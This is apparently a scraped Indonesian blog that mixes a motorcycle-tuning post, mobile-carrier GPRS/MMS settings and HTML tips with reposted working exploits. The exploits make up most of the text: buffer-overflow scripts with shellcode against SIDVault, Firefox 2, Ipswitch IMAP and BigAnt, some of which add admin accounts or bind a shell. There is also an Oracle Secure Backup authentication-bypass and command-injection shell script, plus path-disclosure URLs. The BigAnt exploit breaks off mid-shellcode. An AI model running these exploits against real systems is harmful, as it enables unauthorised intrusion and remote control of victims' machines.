salam bikers ...

• pakai helm sni
• lengkapi surat-surat kendaraan anda
• periksa kendaraan sebelum berangkat
• pokoknya safety first ya...

 Disini ane mau share sebagai pengguna suzuki thunder 125 yang agan-agan biker semua mungkin tau tu motor bongsor badannya tapi cuma punya size 125cc, kebayang kan gimana larinya kalo di jalanan..

kebayang pingin ada tu larinya motor, setelah baca kanan baca kiri ternyata banyak yang nyaranin ganti karbu , ganti koil, ganti ini ganti itu,, pusing kepala, kenapa ga sekalian beli motor kenceng ajah kan..
alhasil ane ngoprek sendiri deh,, berbekal kunci kunci mulai bongkar cylinder head trus ganti tu piston standart bawaan suzi thunder pake piston honda tiger oversize 75, buat gampangnya bawa aja ke tukang bubut minta di bikinin ukurannya supaya pas tu piston tiger ke cylinder thunder gan, karena harus di bubut dulu biar pas tu piston sama pinnya ke jeroan thunder.

kurang puas sama naekin kapasitas ruang bakar ane lari ke jantung tu motor , ganti karbu rx king
untuk ganti karbu king di suzi thunder ternyata ga segampang yang ane kira,,ga bisa langsung klop tu karbu king di intake standar thunder, akhirnya ane ganti tu intake manifold pake punya manifold satria fu, ahasil bisa bisa langsung di pasang gantiin manifold standar thunder secara lobang baut udah ga perlu modif lagi karena lobang baut manifold satria fu dan thunder mirip dan pas.. plus harus di ganti klem karbunya , untuk klem karbu ane coba pake yang murah meriah , beli klem di toko bangunan cuma 6000 rupiah.

buat ngimbangin motor yang udah pake karbu king + ganti piston , enakya sekalian ganti koil pake punya ts125 ato kalo susah nyarinya bisa juga di aplikasiin pake koil honda kharisma..

Alhamdullilah motor thunder ane sekarang udah ga malu maluin gan di jalan,,itu sedikit pengalaman dari ane,

 

Klem karbunya

Intake manifold karbu satria fu

salam bikers....

• 2 comments »

MENTARI

Setting OTA via SMS ;
Kirim SMS ke3000 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual :
GPRS

Profile Name : INDOSATGPRS
Homepage URL : http://wap.klub-mentari.com
IP Address : 10.19.19.19
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatgprs

MMS
Profile Name : INDOSATGPRS
Homepage URL : http://mmsc.indosat.com
IP Address : 10.19.19.19:8080
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatmms

===================================================

IM3

Setting OTA via SMS ;
Kirim SMS ke3939 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual :

GPRS

Connection name : M3-GPRS
Access point name : www.indosat-m3.net
User name : gprs
Password : im3
Authentication : Normal
Homepage : http://wap.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

MMS
Connection name : M3-MMS
Access point name : indosatmms
User name : indosatmms
Password : indosatmms
Authentication : Normal
Homepage : http://mmsc.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

===================================================

KARTU SIMPATI/KARTU AS

Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS[spasi]angka dibelakang simcard Anda (Nomor ICCID/Integrated Circuit Card Identification)
Kemudian tunggu beberapa saat, Anda akan mendapat SMS konfirmasi bahwa aplikasi GPRS sedang diproses. Waktu yang dibutuhkan sekitar 48 jam. Setelah GPRS aktif, Anda akan mendapat notifikasi SMS lagi yang menyatakan GPRS sudah aktif.

Setting Manual :

GPRS

Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8000

MMS

Connection Name: tel-MMS
Data Bearer: GPRS
Access Point Name: mms
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Proxy address: 10.1.89.150
Homepage: http://mms.telkomsel.com/
Connection Security: Off

===================================================

XL

Setting OTA via SMS ;
Ketik SMS dengan isi : GPRS[spasi][spasi] Kirim ke 9667
Ketik SMS dengan isi : MMS[spasi][spasi] Kirin ke 9667

Setting Manual :

GPRS

Connection Name: XL-GPRS
Data Bearer: GPRS
Access Point Name: www.xlgprs.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://wap.lifeinhand.com
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080


MMS

Connection Name: XL-MMS
Data Bearer: GPRS
Access Point Name: www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://mmc.xl.net.id/servlets/mms
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

===================================================

3 (THREE)

Setting Manual :

GPRS

Settings’ Name: 3-GPRS
Homepage : http://wap.three.co.id/
Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs

MMS

Settings’ name : 3-MMS
Homepage : http://mms.hutch.co.id/
GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No

===================================================

 AXIS

Parameter Umum GPRS
Connection Name : AXIS
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXIS
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage : http://wap.axisworld.co.id
Connection Security : Off
Session Mode : Permanent

Parameter Umum MMS
Connection Name : AXISmms
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXISmms
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage / MMS Server : http://mmsc.AXIS
Connection Security : Off
Session Mode : Permanent

===================================================

MATRIX

Setting OTA:
Kirim SMS ke888 dengan pesan :
ACT[spasi]GPRS

• 0 comments »

how to write html code on blogs
automatic blog page will not be able to write and display the html code.
example:
<html>
<title></title>
<body>
<b>html code</b>
</body>
</html>
to be able to write html code in your blog posting can use html code converter tool at the here

• 0 comments »

is a way to hide all or part of the contents of the blog content
Sample :

TITLE :

[SPOILER CONTENT]

The following code :
<div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>TITLE</b> : <input value="Show" style="margin: 0px; padding: 0px; width: 60px; font-size: 10px;" onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" type="button"> </div><br /><div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;"><div style="display:none;">[SPOILER CONTENT]</div></div></div><br />

• 0 comments »

how to make text areas on web pages.

maybe this is not strange to you that are familiar with html code and java scripts, but here the tutorial on here just for beginners like me
this is a sample :

Write the text or code you'd like to show here

The following code :
<form name="copy"><div align="center"><input value="Select All" onclick="javascript:this.form.txt.focus();this.form.txt.select();" type="button"/></div><p style="text-align: center;"><textarea style="padding: 3px; width: 300px; height: 50px;" name="txt">Write the text or code you'd like to show here</textarea></p></form>

• 0 comments »

SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)

#!/usr/bin/python

import socket, sys, ldap

print "[*] SidVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)"
print "[*] Original author : blake"
print "[*] Seh Exploit : Skull-Hacker"
print "[*] Tested on Windows XP SP3"

if len(sys.argv)!=2:
print "[*] Usage: %s <ip>" % sys.argv[0]
sys.exit(0)


# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")


sploit = "\x41"*1028
sploit += "SKH" #Trick track ;)
sploit += shellcode
sploit += "\x44"*(3299-len(shellcode))
sploit += "\xE8\x18\xF3\xFF\xFF"
sploit += "\x44"*5
sploit += "\xEB\xF4\x90\x90"
sploit += "\x29\x10\x40" #univ ret

print "[+] Sending payload"

l = ldap.open(sys.argv[1])
l.simple_bind("dc=" +sploit, "\x42" * 256)
print "[+] Done!\n"

• 0 comments »

#########################################################
#
# Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure
# Found By: Dr_IDE
# Download: http://www.javascript.nu/xerver
# Tested On: Windows XPSP3
#
#########################################################

- Description -

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to remote arbitrary source code disclosure by the
following means.

- Notes -
1. This is remote only.
2. Out of the box this server is completely unsecure and wide open,
my configuration is attached below in case reproduction is an issue.


- Technical Details -

http://[ webserver IP]/[ file ][::$DATA]


- Sample Case 1 -

http://172.16.2.101/index.html::$DATA

- Remote Browser Output -

<html><head></head><body> This is my Web page </body></html>


- Sample Case 2 -

http://172.16.2.101/default.asp::$DATA

- Remote Browser Output -

<html>
<body>
<%
response.write("My first ASP script!")
%>
</body>
</html>

- My Server Configuration-

Filename: Xerver2.cfg

----------------------snip-------------------------------------------------------------------------
80
index.html,index.htm,index.shtml,default.html,default.asp,index.php,index.phtml,index.pl,index.cgi
c:\INETPUB\

c:\INETPUB\
php=php,php3=php,php4=php,phtml=php,pl=perl,cgi=perl,exe=,bat=


0
0
0
2
1
XerverWebserver.log
----------------------snip-------------------------------------------------------------------------

• 0 comments »

#!/usr/bin/python
# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
#
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
#
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
egg = (
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4"
"\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23"
"\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43"
"\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11"
"\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a"
"\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea"
"\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6"
"\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b"
"\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16"
"\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4"
"\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49"
"\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e"
"\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21"
"\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53")

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
shellcode = (
"툳邐邐䊐橒堂⻍"
"Լ瑚룯䅂䅂懲疯"
"꿪쳌쳌쳌쳌"
"쳌쳌쳌쳌")

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
s = "\xC3\xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

class myRequestHandler(BaseHTTPRequestHandler):

def create_exploit_buffer(self):
html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"

# Store the egg and adduser shellcode in CDATA
# The egghunter will try and find this in memory
html += "<!CDATA[" + "\x42\x41\x42\x41\x42\x41\x42\x41" + egg
html += "]>\n"

html += "<a href=\""
html += "\x01"
html += "xx://dmc"
html += utf8chars
html += "/"

html += "邐" * 1700 # Windows XP SP3 SEH offset
html += "ძ邐" # unicode - ptr to next seh "\xeb\x10\x90\x90";
html += "ᇧ怷" # 0x603711e7 - pop/pop/ret - xpcom_core.dll
html +="邐" * 10
html += shellcode # add egghunter
html +="邐" * 10
html += "\" >s</a>"
html += "\n</body>"
html += "\n</html>"

return html

def do_GET(self):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
html = self.create_exploit_buffer()
self.wfile.write(html)
print "[*] Evil payload sent\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\n"

def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()

print "FireFox 2.0.0.16 x86 Exploit\nAuthor: dmc@deadbeef.co.uk\n"
print "[*] Starting evil web server"
print "[*] Waiting for clients\n"

httpd = HTTPServer(('', 80), myRequestHandler)

try:
httpd.handle_request()
httpd.serve_forever()
except KeyboardInterrupt:
print "\n\n[*] Interupt caught, exiting.\n\n"
sys.exit(1)

• 0 comments »

/* Ipsbitch.cpp vs Ipswitch IMAP
* Tested on: Windows 2000 SP4
* Ref: CVE-2007-2795
*
* Author: Dominic Chell <dmc@deadbeef.co.uk>
* Found this half written on a VM so decided to finish it.
*
* Payload adds a local admin account USER=r00t PASS=r00tr00t!!
*
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20\n(C) dmc <dmc@deadbeef.co.uk>\n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// USER=r00t PASS=r00tr00t!!
// Bad Chars = '\x00\x0a\x0d\x0b\x09\x0c\x20'
// Encoded with shikata ga nai
char shellcode[] =
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4"
"\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23"
"\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43"
"\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11"
"\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a"
"\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea"
"\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6"
"\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b"
"\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16"
"\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4"
"\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49"
"\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e"
"\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21"
"\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53";

char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;

char user[20], pass[20];
char payload[2048];
char recvbuf[1024];
if(argc < 4)
{
usage();
return 0;
}

if((strlen(argv[3])<15) && (strlen(argv[4])<15))
{
strncpy(user, argv[3], 14);
strncpy(pass, argv[4], 14);
user[14] = '\0';
pass[14] = '\0';
}
else {
usage();
return 0;
}

int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);;

fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20\n(C) dmc <dmc@deadbeef.co.uk>\n\n");

char auth[50];
memset(auth, 0, sizeof(auth));
memset(recvbuf, 0, sizeof(recvbuf));
strcat(auth, "0 LOGIN ");
strcat(auth, user);
strcat(auth, " ");
strcat(auth, pass);
strcat(auth, "\r\n");
strcat(auth, "\0");

memset(payload, 0, sizeof(payload));
strcat(payload, "2 SEARCH BEFORE ");
for(int i=0; i<80; i++) strcat(payload, "\x90");
strcat(payload, nextseh);
strcat(payload, seh);
for(int i=0; i<100; i++) strcat(payload, "\x90");
strcat(payload, shellcode);
for(int i=0; i<300; i++) strcat(payload, "\x90");
strcat(payload, "\r\n");

WSADATA info;
if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET) error("[*] socket error");
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ipaddr);
server.sin_port=htons(port);

WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

select(s+1,NULL,&mask,NULL,&timeout);
if(FD_ISSET(s,&mask))
{
fprintf(stderr, "[*] Connecting to IMAP server\n");
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Got banner:\n%s\n", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
fprintf(stderr, "[*] Authenticating...\n");
if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error("[*] error sending auth payload");
memset(auth, 0, sizeof(auth));
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
fprintf(stderr, "[*] Sending SELECT command...\n");
if (send(s,"1 SELECT INBOX\r\n",strlen("1 SELECT INBOX\r\n"),0)==SOCKET_ERROR) error("[*] error sending auth payload");
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
fprintf(stderr, "[*] Sending exploit payload...\n");
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error("[*] error sending exploit payload");
memset(payload, 0, sizeof(payload));
fprintf(stderr, "[*] Now try USER=r00t PASS=r00tr00t!!\n");
return 0;
}
}

• 0 comments »

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <target IP>"
echo "i.e.: ./$(basename $0) 192.168.0.100"
exit
fi

if ! which curl >/dev/null
then
echo "'curl' is required in order to handle HTTPS connections"
exit
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

if [[ -z $check ]]
then
echo "[!] Fatal error. I cannot execute arbitrary commands"
exit
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check

while(true); do
echo -n \>
read -r cmd

if [ "$cmd" == "EXIT" ]
then
echo "[+] Removing the temporary file and closing"
shell="1%26del%20osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
exit
fi

#URLencode function
cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
shell="1%26$cmd>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
echo "[+] Last successful command execution:"
curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end

• 0 comments »

 BSR Webweaver Version 1.33 /Scripts access restriction bypass vulnerbility

#################################################
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#################################################

[*] Download Page : http://www.brswebweaver.com/downloads.html


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Description  : In ISAPI/CGI path is [%installdirectory%/scripts] and
through HTTP the alias is [http://[host]/scripts] ,

The access security check is that if the attacker tries to access /scripts
a 404 Error response occurs ! Now to bypass and

check the directory listing [That is if Directory Browsing is allowed in
the server Configuration !] just copy and paste the

exploit url !.

This is the reason this exploit is not called a Directory Listing Exploit !



[*] Exploitation :


       [+] http://127.0.0.1/scripts/%bg%ae%bg%ae/.exe

• 0 comments »

BigAnt Server 2.50 GET Request Remote BOF Exploit [ SEH ]

# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default

# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
